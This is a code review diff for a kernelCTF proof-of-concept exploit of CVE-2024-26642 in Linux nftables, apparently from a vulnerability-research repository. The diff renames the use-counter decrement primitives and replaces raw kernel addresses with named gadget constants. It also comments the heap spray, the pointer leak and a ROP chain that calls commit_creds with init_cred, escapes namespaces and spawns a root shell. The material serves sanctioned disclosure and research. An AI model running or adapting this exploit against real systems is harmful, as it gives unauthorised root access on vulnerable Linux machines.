Solve comments

Author: conlonial

pocs/linux/kernelctf/CVE-2024-26642_cos/docs/exploit.md

@@ -1,5 +1,5 @@
 # Exploit detail about CVE-2024-26642
-If you want to get some base information about CVE-2023-6817, please read [vulnerability.md](./vulnerability.md) first.
+If you want to get some base information about CVE-2024-26642, please read [vulnerability.md](./vulnerability.md) first.
 
 ## Background
 nftables is a netfilter project that aims to replace the existing {ip,ip6,arp,eb}tables framework, providing a new packet filtering framework for {ip,ip6}tables, a new userspace utility (nft) and A compatibility layer. It uses existing hooks, link tracking system, user space queuing component and netfilter logging subsystem.
@@ -153,4 +153,4 @@ It will trigger the vulnerability as described above. In order to achieve the ef
 
 
 ## Exploit
-Because the exploit steps of CVE-2024-26642 is the same as CVE-2023-6817, please read [here](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-6817_lts_cos/docs/exploit.md).
+Because the exploit steps of CVE-2024-26642 is the same as CVE-2023-6817, please read [here](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-6817_lts_cos/docs/exploit.md).

pocs/linux/kernelctf/CVE-2024-26642_cos/exploit/cos-105-17412.294.23/chain.h

@@ -1,14 +1,13 @@
 extern int cur_handle;
 void new_chain(struct nl_sock * socket, char *table_name, char *chain_name, int if_binding){
     struct nl_msg * msg = nlmsg_alloc();
-    //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE);
     struct nlmsghdr *hdr1 = nlmsg_put(
             msg,
             NL_AUTO_PORT, // auto assign current pid
             NL_AUTO_SEQ, // begin wit seq number 0
             NFNL_MSG_BATCH_BEGIN,   // TYPE
             sizeof(struct nfgenmsg),
-            NLM_F_REQUEST //NLM_F_ECHO
+            NLM_F_REQUEST 
     );
     struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg));
     h->nfgen_family = 2;//NFPROTO_IPV4;
@@ -23,7 +22,7 @@ void new_chain(struct nl_sock * socket, char *table_name, char *chain_name, int
             NL_AUTO_SEQ, // begin wit seq number 0
             (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWCHAIN),// TYPE
             sizeof(struct nfgenmsg),
-            NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO
+            NLM_F_REQUEST|NLM_F_CREATE 
     );
     struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg));
     h2->nfgen_family = 2;//NFPROTO_IPV4;
@@ -37,7 +36,7 @@ void new_chain(struct nl_sock * socket, char *table_name, char *chain_name, int
             NL_AUTO_SEQ, // begin wit seq number 0
             NFNL_MSG_BATCH_END,// TYPE
             sizeof(struct nfgenmsg),
-            NLM_F_REQUEST //NLM_F_ECHO
+            NLM_F_REQUEST 
     );
     nla_put_string(msg2, NFTA_CHAIN_TABLE, table_name);
     nla_put_string(msg2, NFTA_CHAIN_NAME, chain_name);
@@ -54,8 +53,6 @@ void new_chain(struct nl_sock * socket, char *table_name, char *chain_name, int
     nlmsg_free(msg);
     if (res < 0) {
         fprintf(stderr, "sending message failed\n");
-    } else {
-        //printf("Create chain %s\n",chain_name);
     }
     cur_handle++;
 }
@@ -68,7 +65,7 @@ struct nlmsghdr * new_chain_msg(char *table_name, char *chain_name, int if_bindi
             NL_AUTO_SEQ, // begin wit seq number 0
             (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWCHAIN),// TYPE
             sizeof(struct nfgenmsg),
-            NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO
+            NLM_F_REQUEST|NLM_F_CREATE 
     );
     struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg));
     h2->nfgen_family = 2;//NFPROTO_IPV4;
@@ -84,73 +81,6 @@ struct nlmsghdr * new_chain_msg(char *table_name, char *chain_name, int if_bindi
     return hdr2;
 }
 
-void new_chain_with_hook(struct nl_sock * socket, char *table_name, char *chain_name, int hook_num, int priority){
-    struct nl_msg * msg = nlmsg_alloc();
-    //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE);
-    struct nlmsghdr *hdr1 = nlmsg_put(
-            msg,
-            NL_AUTO_PORT, // auto assign current pid
-            NL_AUTO_SEQ, // begin wit seq number 0
-            NFNL_MSG_BATCH_BEGIN,   // TYPE
-            sizeof(struct nfgenmsg),
-            NLM_F_REQUEST //NLM_F_ECHO
-    );
-    struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg));
-    h->nfgen_family = 2;//NFPROTO_IPV4;
-    h->version = 0;
-    h->res_id = NFNL_SUBSYS_NFTABLES;
-    memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg));
-
-    struct nl_msg * msg2 = nlmsg_alloc();
-    struct nlmsghdr *hdr2 = nlmsg_put(
-            msg2,
-            NL_AUTO_PORT, // auto assign current pid
-            NL_AUTO_SEQ, // begin wit seq number 0
-            (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWCHAIN),// TYPE
-            sizeof(struct nfgenmsg),
-            NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO
-    );
-    struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg));
-    h2->nfgen_family = 2;//NFPROTO_IPV4;
-    h2->version = 0;
-    h2->res_id = NFNL_SUBSYS_NFTABLES;
-    memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg));
-    struct nl_msg * msg3 = nlmsg_alloc();
-    struct nlmsghdr *hdr3 = nlmsg_put(
-            msg3,
-            NL_AUTO_PORT, // auto assign current pid
-            NL_AUTO_SEQ, // begin wit seq number 0
-            NFNL_MSG_BATCH_END,// TYPE
-            sizeof(struct nfgenmsg),
-            NLM_F_REQUEST //NLM_F_ECHO
-    );
-    
-    struct nl_msg *hook = nlmsg_alloc();
-    nla_put_u32(hook, NFTA_HOOK_HOOKNUM, htonl(hook_num));
-    nla_put_u32(hook, NFTA_HOOK_PRIORITY, htonl(priority));
-
-
-    nla_put_string(msg2, NFTA_CHAIN_TABLE, table_name);
-    nla_put_string(msg2, NFTA_CHAIN_NAME, chain_name);
-    nla_put_nested(msg2, NFTA_CHAIN_HOOK, hook);
-    
-    
-    uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len);
-    char *buf = malloc(total_size);
-    memset(buf,0,total_size);
-    memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len));
-    memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len));
-    memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len));
-    int res = nl_sendto(socket, buf, total_size);
-    nlmsg_free(msg);
-    if (res < 0) {
-        fprintf(stderr, "sending message failed\n");
-    } else {
-        //printf("Create chain %s\n",chain_name);
-    }
-    cur_handle++;
-}
-
 void del_chain(struct nl_sock * socket, char *table_name, char *chain_name){
     struct nl_msg * msg = nlmsg_alloc();
     //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE);
@@ -160,7 +90,7 @@ void del_chain(struct nl_sock * socket, char *table_name, char *chain_name){
             NL_AUTO_SEQ, // begin wit seq number 0
             NFNL_MSG_BATCH_BEGIN,   // TYPE
             sizeof(struct nfgenmsg),
-            NLM_F_REQUEST //NLM_F_ECHO
+            NLM_F_REQUEST 
     );
     struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg));
     h->nfgen_family = 2;//NFPROTO_IPV4;
@@ -203,8 +133,6 @@ void del_chain(struct nl_sock * socket, char *table_name, char *chain_name){
     nlmsg_free(msg);
     if (res < 0) {
         fprintf(stderr, "sending message failed\n");
-    } else {
-        //printf("Delete chain %s\n",chain_name);
     }
 }
 

pocs/linux/kernelctf/CVE-2024-26642_cos/exploit/cos-105-17412.294.23/exploit

@@ -29,7 +29,7 @@
 #include "set.h"
 #include "chain.h"
 #include "rule.h"
-
+#include "rop.h"
 
 char *leak_data = NULL;
 int table_num = 0;
@@ -40,7 +40,6 @@ void shell(){
     printf("ret2usr success! uid : %d\n",getuid());
     char *args[] = {"/bin/sh", "-i", NULL};
     execve(args[0], args, NULL);
-    //while(1);
 }
 
 static void save_state() {
@@ -61,7 +60,6 @@ void pin_on_cpu(int cpu) {
     perror("sched_setaffinity()");
     exit(EXIT_FAILURE);
   }
-  usleep(1000);
 }
 
 int setup_sandbox(void) {
@@ -73,15 +71,13 @@ int setup_sandbox(void) {
     perror("[-] unshare(CLONE_NEWNET)");
     return -1;
   }
-  pin_on_cpu(0);  
   return 0;
 }
 
 
 
 void send_msg_list(struct nl_sock * socket, struct nlmsghdr **msg_list, int num){
     struct nl_msg * msg = nlmsg_alloc();
-    //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE);
     struct nlmsghdr *hdr1 = nlmsg_put(
             msg,
             NL_AUTO_PORT, // auto assign current pid
@@ -133,7 +129,6 @@ int nl_callback_leak_ops(struct nl_msg* recv_msg, void* arg)
     printf("Get message back!\n");
 
     if (ret_hdr->nlmsg_type == NLMSG_ERROR) {
-        //printf("Received NLMSG_ERROR message!\n");
         return NL_STOP;
     }
 
@@ -166,10 +161,8 @@ int nl_callback_find_target_setelem(struct nl_msg* recv_msg, void* arg)
     struct nlmsghdr * ret_hdr = nlmsg_hdr(recv_msg);
     struct nlattr * tb_msg[NFTA_SET_MAX+1];
     memset(tb_msg, 0, NFTA_SET_MAX * 8);
-    //printf("Get message back!\n");
 
     if (ret_hdr->nlmsg_type == NLMSG_ERROR) {
-        //printf("Received NLMSG_ERROR message!\n");
         return NL_STOP;
     }
 
@@ -189,7 +182,6 @@ int nl_callback_find_target_setelem(struct nl_msg* recv_msg, void* arg)
         nla_parse_nested(tb_msg3, NFTA_SET_MAX, tb_msg2[1],NULL);
         char *val = malloc(nla_len(tb_msg3[NFTA_SET_ELEM_KEY]));
         nla_memcpy(val, tb_msg3[NFTA_SET_ELEM_KEY], nla_len(tb_msg3[NFTA_SET_ELEM_KEY]));
-        //printf("Get key : %llx\n", *(uint64_t *)(val+4));
         uint32_t udata_len = nla_len(tb_msg3[NFTA_SET_ELEM_USERDATA]);
         if(udata_len != 0xa1)
 		printf("udata len : %d\n",udata_len);
@@ -229,7 +221,7 @@ void spray_tables(struct nl_sock * socket, int count, char *udata, int size){
 
 //make target_obj->use = target_obj->use - repeat_time
 
-void primitive_0(struct nl_sock *socket, char *table, char *target_obj, int repeat_time){
+void primitive_decrease_nft_object_use(struct nl_sock *socket, char *table, char *target_obj, int repeat_time){
     char *pad = malloc(0x100);
     memset(pad,0x41,0x100);
     int i,j;
@@ -253,7 +245,7 @@ void primitive_0(struct nl_sock *socket, char *table, char *target_obj, int repe
 
 //make target_chain->use = target_chain->use - repeat_time
 
-void primitive_1(struct nl_sock *socket, char *table, char *target_chain, int repeat_time){
+void primitive_decrease_nft_chain_use(struct nl_sock *socket, char *table, char *target_chain, int repeat_time){
     char *pad = malloc(0x100);
     memset(pad,0x41,0x100);
     int i,j;
@@ -319,25 +311,24 @@ void leak_and_prepare_rop(struct nl_sock *socket){
     new_setelem(socket, table, hash_set_2, pad, 0x100, target_obj, &hash_key, 8, NULL, 0, 0);
     //step 3
     //make target_obj->use = 0xa5 - 0xa5 = 0
-    primitive_0(socket, table, target_obj, 0xa5);
-    sleep(2);
+    primitive_decrease_nft_object_use(socket, table, target_obj, 0xa5);
+    sleep(2);//Waiting the function nf_tables_commit which finally call nft_setelem_data_deactivate 
 
     //step 4
     //delete target obj
     del_obj(socket, table, target_obj, NFT_OBJECT_CT_EXPECT);
-    sleep(2);
+    sleep(2);//Waiting the function nft_commit_release which finally call nft_obj_destroy
     //step 5
     //get heap back
     for(i=0;i<0x1000;i++){
-        //printf("%d\n",i);
         *(uint64_t *)pad = i;
         hash_key = i;
         new_setelem_with_elemdata(socket, table, hash_set, pad, 0xa1, &hash_key, 8, NULL, 0,0);
     }
     //step 6
     //call elem_flush to free all the elements of the pipapo set,  make setelem->udata_len = 0xfc
     elem_flush(socket, table, pipapo_set);
-    sleep(2);
+    sleep(2);//Waiting the function nft_commit_release which finally call nf_tables_set_elem_destroy
     //step 7 Get leak data
 
     struct nl_sock * socket2 = nl_socket_alloc();
@@ -357,14 +348,14 @@ void leak_and_prepare_rop(struct nl_sock *socket){
         nl_recvmsgs_default(socket2);
         nl_recvmsgs_default(socket2);
     }
-    uint64_t obj_a = *(uint64_t *)&leak_data[0xcb];
+    uint64_t obj_a = *(uint64_t *)&leak_data[0xcb];//0xcb and 0xcb+8 are in the nft_obj->list.next and nft_obj->list.prev structures of the adjacent set elements created in step 5.
     uint64_t obj_b = *(uint64_t *)&leak_data[0xcb+8];
     printf("leak obj A heap : %llx\n",obj_a);
     printf("leak obj B heap : %llx\n",obj_b);
 
     //step 8 Delete all the set elements created in step 5
     elem_flush(socket, table, hash_set);
-    sleep(2);
+    sleep(2);//Waiting the function nft_commit_release which finally call nf_tables_set_elem_destroy
     *(uint64_t *)&pad[0x20] = obj_a + 0x80; 
     spray_tables(socket,0x400, pad, 0xcc);
     printf("spray finish\n");
@@ -381,30 +372,30 @@ void leak_and_prepare_rop(struct nl_sock *socket){
     nl_recvmsgs_default(socket2);
     printf("Leak end.\n");
     printf("Start preparing ROP gadget in heap.\n");
-    kernel_off = leak_ops - 0xFFFFFFFF82ACB840;
+    kernel_off = leak_ops - NFT_CT_EXPECT_OBJ_OPS; //nft_ct_expect_obj_ops
     char *ops = malloc(0x100);
     //ops->dump
-    *(uint64_t *)&ops[0x40] = kernel_off + 0xFFFFFFFF81519693;//leave ; ret
+    *(uint64_t *)&ops[0x40] = kernel_off + LEAVE_RET;
     //ops->type
-    *(uint64_t *)&ops[0x70] = kernel_off + 0xFFFFFFFF8371BF00;//last type
+    *(uint64_t *)&ops[0x70] = kernel_off + NFT_LAST_TYEP;//nft_last_type
 
-    *(uint64_t *)&ops[0x08] = kernel_off + 0xffffffff81081910;//pop rdi; ret
-    *(uint64_t *)&ops[0x10] = kernel_off + 0xFFFFFFFF83462180;//init_cred
-    *(uint64_t *)&ops[0x18] = kernel_off + 0xFFFFFFFF8110E830;//commit_creds;
-    *(uint64_t *)&ops[0x20] = kernel_off + 0xffffffff81068153;//pop rdi ; pop r14 ; pop r13 ; pop r12 ; pop rbp ; pop rbx ; ret
+    *(uint64_t *)&ops[0x08] = kernel_off + POP_RDI_RET;
+    *(uint64_t *)&ops[0x10] = kernel_off + INIT_CRED;
+    *(uint64_t *)&ops[0x18] = kernel_off + COMMIT_CREDS;
+    *(uint64_t *)&ops[0x20] = kernel_off + POP_RDI_POP_R14_POP_R13_POP_R12_POP_RBP_POP_RBX_RET;
     *(uint64_t *)&ops[0x28] = 1;
-    *(uint64_t *)&ops[0x58] = kernel_off + 0xFFFFFFFF81105680;//find_task_by_vpid
-    *(uint64_t *)&ops[0x60] = kernel_off + 0xFFFFFFFF8106815A;//pop rbp ; pop rbx ; ret ; because ops->0x70 is the last_type
-    *(uint64_t *)&ops[0x78] = kernel_off + 0xffffffff8102c701;//mov rdi, rax ; mov eax, ebx ; pop rbx ; or rax, rdi ; ret
-    *(uint64_t *)&ops[0x88] = kernel_off + 0xFFFFFFFF817E4E5E;//pop rsi ; ret
-    *(uint64_t *)&ops[0x90] = kernel_off + 0xFFFFFFFF83461F40;//init_nsproxy
-    *(uint64_t *)&ops[0x98] = kernel_off + 0xFFFFFFFF8110CE30;//switch_task_namespaces
-    *(uint64_t *)&ops[0xa0] = kernel_off + 0xFFFFFFFF82002117;//swapgs; ret
-    *(uint64_t *)&ops[0xa8] = kernel_off + 0xFFFFFFFF822011A7;//iretq
+    *(uint64_t *)&ops[0x58] = kernel_off + FIND_TASK_BY_VPID;
+    *(uint64_t *)&ops[0x60] = kernel_off + POP_RBP_POP_RBX_RET;// because ops->0x70 is the last_type
+    *(uint64_t *)&ops[0x78] = kernel_off + MOV_RDI_RAX_MOV_EAX_EBX_POP_RBX_OR_RAX_RDI_RET;
+    *(uint64_t *)&ops[0x88] = kernel_off + POP_RSI_RET;
+    *(uint64_t *)&ops[0x90] = kernel_off + INIT_NSPROXY;
+    *(uint64_t *)&ops[0x98] = kernel_off + SWITCH_TASK_NAMESPACES;
+    *(uint64_t *)&ops[0xa0] = kernel_off + SWAPGS_RET;
+    *(uint64_t *)&ops[0xa8] = kernel_off + IRETQ;
     *(uint64_t *)&ops[0xb0] = (uint64_t)shell;
     *(uint64_t *)&ops[0xb8] = user_cs;
     *(uint64_t *)&ops[0xc0] = user_rflags;
-    *(uint64_t *)&ops[0xc8] = user_rsp|8;
+    *(uint64_t *)&ops[0xc8] = user_rsp|8;//(You don't need to add '|8' when exploiting kernelctf.vrp.ctfcompetition.com:1337) It seems that without this '|8', a stack error will occur during github pull check. I haven't studied why this problem occurs, but I guess it has something to do with the stack alignment when returning to the function shell.
     *(uint64_t *)&ops[0xd0] = user_ss;
     //step 11
     //free the last object.
@@ -432,14 +423,14 @@ void jmp_rop(struct nl_sock * socket){
     cur_handle = 0;
     new_chain(socket, table, target_chain, 0);
 
-    new_set_pipapo_for_chain(socket, table, pipapo_set, 0x40);
-    new_set_hashtable_with_elemdata(socket, table, hash_set_for_expr, 0x30, 0x10);
+    new_set_pipapo_for_chain(socket, table, pipapo_set, 0x40);// Here 0x40 has no special meaning. The old code is reused.
+    new_set_hashtable_with_elemdata(socket, table, hash_set_for_expr, 0x30, 0x10); //Here 0x30 has no special meaning. The old code is reused.But it will affect the pad_len parameter used when we call the new_setelem_with_expr_and_elemdata function in step 4, because we need to make the element size created in step 4 and nft_chain in the same cache (kmalloc-128). 
     nl_socket_modify_cb(socket,NL_CB_MSG_IN, NL_CB_CUSTOM, nl_callback_find_target_setelem, NULL);
 
     //step 1
     //create some elements to make chain->use = 0x20
 
-    char *pad = malloc(0x100);
+    char *pad = malloc(0x100); //Here 0x100 has no special meaning. The old code is reused.
     memset(pad,0x41,0x100);
     char *key = malloc(0x40);
     char *key_end = malloc(0x40);
@@ -454,7 +445,7 @@ void jmp_rop(struct nl_sock * socket){
 
     //step 2 trigger vul to make chain->use = 0
 
-    primitive_1(socket, table, target_chain, 0x20);
+    primitive_decrease_nft_chain_use(socket, table, target_chain, 0x20);
     //step 3 delete target chain
 
     del_chain(socket, table, target_chain);
@@ -481,19 +472,26 @@ void jmp_rop(struct nl_sock * socket){
 
 }
 
+struct nl_sock * setup_nl_socket(){
+    struct nl_sock * socket = nl_socket_alloc();
+
+    if(nfnl_connect(socket)<0){
+        printf("nfnl_connect fail!\n");
+        return NULL;
+    }
+    return socket;
+}
 
 int main(void) {
     if (setup_sandbox() < 0){
         printf("Create sandbox fail!\n");
         return 0;
     }
+    pin_on_cpu(0);
     save_state();
-    struct nl_sock * socket = nl_socket_alloc();
-
-    if(nfnl_connect(socket)<0){
-    	printf("nfnl_connect fail!\n");
-	return 0;
-    }
+    struct nl_sock * socket = setup_nl_socket();
+    if(socket == NULL)
+	    return 0;
 
     leak_and_prepare_rop(socket);
     jmp_rop(socket);